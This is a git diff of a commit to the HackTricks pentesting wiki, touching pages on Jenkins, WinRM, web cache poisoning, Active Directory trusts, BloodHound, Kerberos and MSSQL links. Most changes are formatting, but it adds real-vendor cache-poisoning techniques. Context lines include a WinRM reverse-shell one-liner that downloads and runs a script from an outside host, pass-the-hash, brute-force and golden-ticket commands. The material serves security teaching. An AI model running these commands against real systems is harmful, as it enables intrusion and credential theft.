GitBook: [#3340] No subject
BIN
.gitbook/assets/image (157) (1).png
Normal file
After Width: | Height: | Size: 142 KiB |
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 36 KiB |
BIN
.gitbook/assets/image (159) (1).png
Normal file
After Width: | Height: | Size: 32 KiB |
Before Width: | Height: | Size: 32 KiB After Width: | Height: | Size: 19 KiB |
BIN
.gitbook/assets/image (163) (1).png
Normal file
After Width: | Height: | Size: 73 KiB |
Before Width: | Height: | Size: 73 KiB After Width: | Height: | Size: 19 KiB |
BIN
.gitbook/assets/image (166) (1).png
Normal file
After Width: | Height: | Size: 409 KiB |
Before Width: | Height: | Size: 409 KiB After Width: | Height: | Size: 230 KiB |
BIN
.gitbook/assets/image (167) (1).png
Normal file
After Width: | Height: | Size: 56 KiB |
Before Width: | Height: | Size: 56 KiB After Width: | Height: | Size: 24 KiB |
BIN
.gitbook/assets/image (171) (1).png
Normal file
After Width: | Height: | Size: 53 KiB |
Before Width: | Height: | Size: 53 KiB After Width: | Height: | Size: 72 KiB |
BIN
.gitbook/assets/image (175) (1).png
Normal file
After Width: | Height: | Size: 31 KiB |
Before Width: | Height: | Size: 31 KiB After Width: | Height: | Size: 21 KiB |
BIN
.gitbook/assets/image (180) (1).png
Normal file
After Width: | Height: | Size: 20 KiB |
Before Width: | Height: | Size: 20 KiB After Width: | Height: | Size: 55 KiB |
|
@ -16,13 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
## Basic Information
|
||||
|
||||
|
@ -86,13 +84,11 @@ Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/offline\_de
|
|||
println(hudson.util.Secret.decrypt("{...}"))
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
## Code Execution
|
||||
|
||||
|
@ -112,7 +108,7 @@ Or **try to access to the path \_/configure**\_ in each project (example: /_me/m
|
|||
|
||||
If you are allowed to configure the project you can **make it execute commands when a build is successful**:
|
||||
|
||||
![](<../.gitbook/assets/image (159).png>)
|
||||
![](<../.gitbook/assets/image (159) (1).png>)
|
||||
|
||||
Click on **Save** and **build** the project and your **command will be executed**.\
|
||||
If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
|
||||
|
@ -205,13 +201,11 @@ grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
|
|||
* [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
|
||||
* [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# 5985,5986 - Pentesting WinRM
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
[https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
|
||||
|
||||
# WinRM
|
||||
## WinRM
|
||||
|
||||
[Windows Remote Management](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) (WinRM) is a Microsoft protocol that **allows remote management of Windows machines** over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
|
||||
|
||||
|
@ -32,7 +31,7 @@ The easiest way to detect whether WinRM is available is by seeing if the port is
|
|||
|
||||
If one of these ports is open, WinRM is configured and you can try entering a remote session.
|
||||
|
||||
# **Initiating WinRM Session**.
|
||||
## **Initiating WinRM Session**.
|
||||
|
||||
We can configure PowerShell to work with WinRM. According to Microsoft documentation, Enable-PSRemoting is a cmdlet that configures the computer to receive PowerShell remote commands. If we have access to an elevated PowerShell prompt on the victim, we cam enable it and add any "attackers" as trusted hosts. We can run the following two commands:
|
||||
|
||||
|
@ -43,13 +42,13 @@ Set-Item wsman:\localhost\client\trustedhosts *
|
|||
|
||||
This adds a wildcard to the trustedhosts setting. Be wary of what that entails. _Note: I also had to change the network type on my attack machine from "Public" to "Work" network._
|
||||
|
||||
You can also **activate** WinRM **remotely** _**\_using \_wmic_:
|
||||
You can also **activate** WinRM **remotely** _\*\*\_using \_wmic_:
|
||||
|
||||
```
|
||||
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
|
||||
```
|
||||
|
||||
## Test if configured
|
||||
### Test if configured
|
||||
|
||||
Once the attack machine is configured, use the `Test-WSMan` function to test whether the target is configured for WinRM. You should see some information returned about the protocol version and wsmid:
|
||||
|
||||
|
@ -59,7 +58,7 @@ Once the attack machine is configured, use the `Test-WSMan` function to test whe
|
|||
|
||||
In this case the first one is configured and the second isn't.
|
||||
|
||||
## Execute a command
|
||||
### Execute a command
|
||||
|
||||
Now we can use PowerShell's `Invoke-Command` to remotely execute a command on the target over WinRM. To remotely run `ipconfig` and see the output:
|
||||
|
||||
|
@ -67,7 +66,7 @@ Now we can use PowerShell's `Invoke-Command` to remotely execute a command on th
|
|||
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
|
||||
```
|
||||
|
||||
![](<../.gitbook/assets/image (163).png>)
|
||||
![](<../.gitbook/assets/image (163) (1).png>)
|
||||
|
||||
You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do:
|
||||
|
||||
|
@ -75,19 +74,19 @@ You can also **execute a command of your current PS console via** _**Invoke-Comm
|
|||
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
|
||||
```
|
||||
|
||||
## Execute a Script
|
||||
### Execute a Script
|
||||
|
||||
```ruby
|
||||
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
|
||||
```
|
||||
|
||||
## Get reverse-shell
|
||||
### Get reverse-shell
|
||||
|
||||
```ruby
|
||||
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
|
||||
```
|
||||
|
||||
## Get a PS session
|
||||
### Get a PS session
|
||||
|
||||
Or, if you want to drop right into an interactive PowerShell session, use the `Enter-PSSession` function:
|
||||
|
||||
|
@ -99,7 +98,7 @@ Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Creden
|
|||
|
||||
**The session will run in a new process (wsmprovhost) inside the "victim"**
|
||||
|
||||
## **Forcing WinRM Open**
|
||||
### **Forcing WinRM Open**
|
||||
|
||||
If you really want to use PS Remoting and WinRM but the target isn't configured for it, you could "force" it on through a single command. I wouldn't recommend this but if you really wanted to use WinRM or PSRemoting than by all means do it this way. For example, using PSExec:
|
||||
|
||||
|
@ -109,7 +108,7 @@ PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p
|
|||
|
||||
Now we can enter a remote PS session on the victim.
|
||||
|
||||
## Saving and Restoring sessions
|
||||
### Saving and Restoring sessions
|
||||
|
||||
This **won't work** if the the **language** is **constrained** in the remote computer.
|
||||
|
||||
|
@ -126,7 +125,7 @@ Inside this sessions you can load PS scripts using _Invoke-Command_
|
|||
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
|
||||
```
|
||||
|
||||
## Errors
|
||||
### Errors
|
||||
|
||||
If you find the following error:
|
||||
|
||||
|
@ -139,9 +138,9 @@ winrm quickconfig
|
|||
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
|
||||
```
|
||||
|
||||
# WinRM connection in linux
|
||||
## WinRM connection in linux
|
||||
|
||||
## Brute Force
|
||||
### Brute Force
|
||||
|
||||
Be careful, brute-forcing winrm could block users.
|
||||
|
||||
|
@ -157,7 +156,7 @@ crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionT
|
|||
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
|
||||
```
|
||||
|
||||
## Using evil-winrm
|
||||
### Using evil-winrm
|
||||
|
||||
```ruby
|
||||
gem install evil-winrm
|
||||
|
@ -171,7 +170,7 @@ evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
|
|||
|
||||
To use evil-winrm to connect to an **IPv6 address** create an entry inside _**/etc/hosts**_ setting a **domain name** to the IPv6 address and connect to that domain.
|
||||
|
||||
## Pass the hash with evil-winrm
|
||||
### Pass the hash with evil-winrm
|
||||
|
||||
```ruby
|
||||
evil-winrm -u <username> -H <Hash> -i <IP>
|
||||
|
@ -179,7 +178,7 @@ evil-winrm -u <username> -H <Hash> -i <IP>
|
|||
|
||||
![](<../.gitbook/assets/image (173).png>)
|
||||
|
||||
## Using a PS-docker machine
|
||||
### Using a PS-docker machine
|
||||
|
||||
```
|
||||
docker run -it quickbreach/powershell-ntlm
|
||||
|
@ -187,9 +186,9 @@ $creds = Get-Credential
|
|||
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
|
||||
```
|
||||
|
||||
## Using a ruby script
|
||||
### Using a ruby script
|
||||
|
||||
Code extracted from here: [https://alamot.github.io/winrm_shell/](https://alamot.github.io/winrm_shell/)
|
||||
Code extracted from here: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)
|
||||
|
||||
```ruby
|
||||
require 'winrm-fs'
|
||||
|
@ -244,11 +243,11 @@ conn.shell(:powershell) do |shell|
|
|||
end
|
||||
```
|
||||
|
||||
# Shodan
|
||||
## Shodan
|
||||
|
||||
* `port:5985 Microsoft-HTTPAPI`
|
||||
|
||||
# HackTricks Automatic Commands
|
||||
## HackTricks Automatic Commands
|
||||
|
||||
```
|
||||
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
|
||||
|
@ -287,7 +286,6 @@ Entry_2:
|
|||
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -303,5 +301,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -16,13 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
## The difference
|
||||
|
||||
|
@ -60,7 +58,7 @@ One more header related to the cache is **`Age`**. It defines the times in secon
|
|||
|
||||
When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
|
||||
|
||||
## Examples
|
||||
## Exploiting Examples
|
||||
|
||||
### Easiest example
|
||||
|
||||
|
@ -127,6 +125,74 @@ Through Security Skills as a Service, we help organizations to **defend against
|
|||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
## Vulnerable Examples
|
||||
|
||||
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
|
||||
|
||||
ATS forwarded the fragment inside the URL without stripping it and generated the cache key only using the host, path and query (ignoring the fragment). So the request `/#/../?r=javascript:alert(1)` was sent to the backend as `/#/../?r=javascript:alert(1)` and the cache key did't have the payload inside of it, only host, path and query.
|
||||
|
||||
### GitHub CP-DoS
|
||||
|
||||
Sending a bad value in the content-type header triggered a 405 response that was cached. The cache key contained the cookie so it was possible only to attack unauth users.
|
||||
|
||||
### GitLab + GCP CP-DoS
|
||||
|
||||
GitLab uses GCP buckets to store static content. **GCP Buckets** support the **header `x-http-method-override`**. So it was possible to send the header `x-http-method-override: HEAD` and poison the cache into returning an empty response body. It could also support the method `PURGE`.
|
||||
|
||||
### Rack Middleware (Ruby on rails)
|
||||
|
||||
Ruby on Rails applications are often deployed alongside the Rack middleware. The Rack code below takes the value of the **`x-forwarded-scheme` value and uses it as the scheme of the request**.
|
||||
|
||||
![](<../.gitbook/assets/image (159).png>)
|
||||
|
||||
Sending the `x-forwarded-scheme: http` header would result into a 301 redirect to the same location which will cause a DoS over that resource as in this example:
|
||||
|
||||
![](<../.gitbook/assets/image (166).png>)
|
||||
|
||||
The application might also support the header `X-forwarded-host` and redirect the user to that host, making possible to load javascripts files from the attacker server:
|
||||
|
||||
![](<../.gitbook/assets/image (157).png>)
|
||||
|
||||
### 403 and Storage Buckets
|
||||
|
||||
**Cloudflare** used to **cache** the **403 responses**, therefore sending **bad Authorization** headers trying to access **S3** or **Azure Storage Blobs** exposed will return a 403 that will be cached. Cloudflare no longer caches 403 responses but this might work with other proxies.
|
||||
|
||||
![](<../.gitbook/assets/image (171).png>)
|
||||
|
||||
### Injecting Keyed Parameters
|
||||
|
||||
Quite often, caches are configured to **only include specific GET parameters in the cache key**.
|
||||
|
||||
For example, Fastly using Varnish **cached the `size` parameter** in the request but if you sent **also** the **`siz%65`** parameter with a bad value, the **cache key** was constructed with the **well written size param**, but the **backend** used the **value inside the URL encoded param**.
|
||||
|
||||
![](<../.gitbook/assets/image (180).png>)
|
||||
|
||||
URL encoding the second `size` parameter caused it to be ignored by the cache, but used by the backend. Giving the parameter a value of 0 would result in a cacheable 400 Bad Request.
|
||||
|
||||
### User Agent Rules
|
||||
|
||||
Due to the high amount of traffic tools like FFUF or Nuclei generate, some developers decided to block reqeusts matching their user-agents. Ironically, these tweaks can introduce unwanted cache poisoning DoS opportunities.
|
||||
|
||||
![](<../.gitbook/assets/image (167).png>)
|
||||
|
||||
I found this worked on multiple targets, with user-agents from different tools or scanners.
|
||||
|
||||
### Illegal Header Fields
|
||||
|
||||
The header name format is defined in [RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) as follows:
|
||||
|
||||
![](<../.gitbook/assets/image (175).png>)
|
||||
|
||||
In theory, if a header name contains characters other than the ones listed in **tchar** it should be rejected with a 400 Bad request. In practice however, servers don't always respect the RFC. The easiest way to exploit this nuance, was by targeting Akamai which doesn't reject invalid headers, but forwards them and caches any 400 error as long the cache-control header is not present.
|
||||
|
||||
![](<../.gitbook/assets/image (163).png>)
|
||||
|
||||
Sending a header containing an illegal character, `\` would cause a cacheable 400 Bad Request error. This was one of the most commonly identified patterns throughout my testing.
|
||||
|
||||
### Finding new headers
|
||||
|
||||
[https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6](https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6)
|
||||
|
||||
## Cache Deception
|
||||
|
||||
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
|
||||
|
@ -146,14 +212,13 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
|
|||
* [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
|
||||
* [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities)
|
||||
* [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)
|
||||
* [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -56,7 +56,7 @@ Imagine a web page that is using the character `'` to create SQL queries with th
|
|||
|
||||
Then, a malicious user could insert a different Unicode character equivalent to `' (0x27)` like `%ef%bc%87` , when the input gets normalised, a single quote is created and a **SQLInjection vulnerability** appears:
|
||||
|
||||
![](<../.gitbook/assets/image (157).png>)
|
||||
![](<../.gitbook/assets/image (157) (1).png>)
|
||||
|
||||
**Some interesting Unicode characters**
|
||||
|
||||
|
|
|
@ -285,7 +285,7 @@ When **2 domains trust each other they exchange keys**, these **keys** are going
|
|||
|
||||
When a **user** tries to **access** a **service** on the **trusting domain** it will request an **inter-realm TGT** to the DC of its domain. The DC wills serve the client this **TGT** which would be **encrypted/signed** with the **inter-realm** **key** (the key both domains **exchanged**). Then, the **client** will **access** the **DC of the other domain** and will **request** a **TGS** for the service using the **inter-realm TGT**. The **DC** of the trusting domain will **check** the **key** used, if it's ok, it will **trust everything in that ticket** and will serve the TGS to the client.
|
||||
|
||||
![](<../../.gitbook/assets/image (166).png>)
|
||||
![](<../../.gitbook/assets/image (166) (1).png>)
|
||||
|
||||
### Different trusts
|
||||
|
||||
|
@ -359,13 +359,15 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
|
|||
```
|
||||
|
||||
#### Exploit writeable Configration NC
|
||||
|
||||
The Configuration NC is the primary repository for configuration information for a forest and is replicated to every DC in the forest. Additionally, every writable DC (not read-only DCs) in the forest holds a writable copy of the Configuration NC. Exploiting this require running as SYSTEM on a (child) DC.
|
||||
|
||||
It is possible to compromise the root domain in various ways. Examples:
|
||||
- [Link GPO to to root DC site](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research)
|
||||
- [Compromise gMSA](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent)
|
||||
- [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
|
||||
- Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
|
||||
|
||||
* [Link GPO to to root DC site](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research)
|
||||
* [Compromise gMSA](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent)
|
||||
* [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
|
||||
* Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
|
||||
|
||||
### External Forest Domain Privilege escalation
|
||||
|
||||
|
@ -376,11 +378,12 @@ Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current
|
|||
```
|
||||
|
||||
### Attack one-way trusted domain/forest (Trust account attack)
|
||||
|
||||
In short, if an attacker has administrative access to FORESTB which trusts FORESTA, the attacker can obtain the credentials for a _trust account_ located in FORESTA. This account is a member of Domain Users in FORESTA through its Primary Group. As we see too often, Domain Users membership is all that is necessary to identify and use other techniques and attack paths to become Domain Admin.
|
||||
|
||||
![](<https://images.squarespace-cdn.com/content/v1/5bbb4a7301232c6e6c8757fa/61a0233f-edd8-40b6-b6ae-8592a29875bd/Picture3.png>)
|
||||
![](https://images.squarespace-cdn.com/content/v1/5bbb4a7301232c6e6c8757fa/61a0233f-edd8-40b6-b6ae-8592a29875bd/Picture3.png)
|
||||
|
||||
This technique is not limited to forest trust but works over any domain/forest one-way trust in the direction trusting -> trusted.
|
||||
This technique is not limited to forest trust but works over any domain/forest one-way trust in the direction trusting -> trusted.
|
||||
|
||||
The trust protections (SID filtering, disabled SID history, and disabled TGT delegation) do not mitigate the technique.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# BloodHound
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# What is BloodHound
|
||||
## What is BloodHound
|
||||
|
||||
> BloodHound is a single page Javascript web application, built on top of [Linkurious](http://linkurio.us), compiled with [Electron](http://electron.atom.io), with a [Neo4j](https://neo4j.com)database fed by a PowerShell ingestor.
|
||||
>
|
||||
|
@ -35,9 +34,9 @@ The **ingestors** are used to **enumerate the domain and extract all the informa
|
|||
|
||||
The **visualisation application uses neo4j** to show how all the information is related and to show different ways to escalate privileges in the domain.
|
||||
|
||||
# Installation
|
||||
## Installation
|
||||
|
||||
1. Bloodhound
|
||||
1. Bloodhound
|
||||
|
||||
To install the visualisation application you will need to install **neo4j** and the **bloodhound application**.\
|
||||
The easiest way to do this is just doing:
|
||||
|
@ -45,28 +44,30 @@ The easiest way to do this is just doing:
|
|||
```
|
||||
apt-get install bloodhound
|
||||
```
|
||||
|
||||
You can **download the community version of neo4j** from [here](https://neo4j.com/download-center/#community).
|
||||
|
||||
2. Ingestors
|
||||
1. Ingestors
|
||||
|
||||
You can download the Ingestors from:
|
||||
- https://github.com/BloodHoundAD/SharpHound/releases
|
||||
- https://github.com/BloodHoundAD/BloodHound/releases
|
||||
- https://github.com/fox-it/BloodHound.py
|
||||
|
||||
3. Learn the path from the graph
|
||||
* https://github.com/BloodHoundAD/SharpHound/releases
|
||||
* https://github.com/BloodHoundAD/BloodHound/releases
|
||||
* https://github.com/fox-it/BloodHound.py
|
||||
|
||||
Bloodhound come with various queries to highlight sensitive compromission path.
|
||||
It it possible to add custom queries to enhance the search and correlation between objects and more!
|
||||
1. Learn the path from the graph
|
||||
|
||||
Bloodhound come with various queries to highlight sensitive compromission path. It it possible to add custom queries to enhance the search and correlation between objects and more!
|
||||
|
||||
This repo has a nice collections of queries: https://github.com/CompassSecurity/BloodHoundQueries
|
||||
|
||||
<u>Installation process</u>:
|
||||
```sh
|
||||
Installation process:
|
||||
|
||||
```
|
||||
$ curl -o "~/.config/bloodhound/customqueries.json" "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/customqueries.json"
|
||||
```
|
||||
|
||||
# Visualisation app Execution
|
||||
## Visualisation app Execution
|
||||
|
||||
After downloading/installing the required applications, lets start them.\
|
||||
First of all you need to **start the neo4j database**:
|
||||
|
@ -91,11 +92,11 @@ You will be prompted for the database credentials: **neo4j:\<Your new password>*
|
|||
|
||||
And bloodhound will be ready to ingest data.
|
||||
|
||||
![](<../../.gitbook/assets/image (171).png>)
|
||||
![](<../../.gitbook/assets/image (171) (1).png>)
|
||||
|
||||
# Ingestors
|
||||
## Ingestors
|
||||
|
||||
## Windows
|
||||
### Windows
|
||||
|
||||
They have several options but if you want to run SharpHound from a PC joined to the domain, using your current user and extract all the information you can do:
|
||||
|
||||
|
@ -114,7 +115,7 @@ runas /netonly /user:domain\user "powershell.exe -exec bypass"
|
|||
|
||||
[**Learn more about Bloodhound in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)
|
||||
|
||||
## **Python**
|
||||
### **Python**
|
||||
|
||||
If you have domain credentials you can run a **python bloodhound ingestor from any platform** so you don't need to depend on Windows.\
|
||||
Download it from [https://github.com/fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) or doing `pip3 install bloodhound`
|
||||
|
@ -144,5 +145,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -16,12 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
|
||||
|
||||
|
@ -112,7 +110,7 @@ In this section, the sequency of messages to perform authentication will be stud
|
|||
|
||||
Firstly, user must get a TGT from KDC. To achieve this, a KRB\_AS\_REQ must be sent:
|
||||
|
||||
![KRB\_AS\_REQ schema message](<../../.gitbook/assets/image (175).png>)
|
||||
![KRB\_AS\_REQ schema message](<../../.gitbook/assets/image (175) (1).png>)
|
||||
|
||||
_KRB\_AS\_REQ_ has, among others, the following fields:
|
||||
|
||||
|
@ -219,12 +217,10 @@ After that, if user privileges are rigth, this can access to service. If is the
|
|||
* Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036)
|
||||
* Fun with LDAP, Kerberos (and MSRPC) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# MSSQL Trusted Links
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,15 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## MSSQL Trusted Links
|
||||
|
||||
# MSSQL Trusted Links
|
||||
|
||||
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA). \
|
||||
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\
|
||||
Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
|
||||
|
||||
**The links between databases work even across forest trusts.**
|
||||
|
||||
## **Powershell**
|
||||
### **Powershell**
|
||||
|
||||
```bash
|
||||
Import-Module .\PowerupSQL.psd1
|
||||
|
@ -77,7 +76,7 @@ Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
|
|||
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"
|
||||
```
|
||||
|
||||
## Metasploit
|
||||
### Metasploit
|
||||
|
||||
You can easily check for trusted links using metasploit.
|
||||
|
||||
|
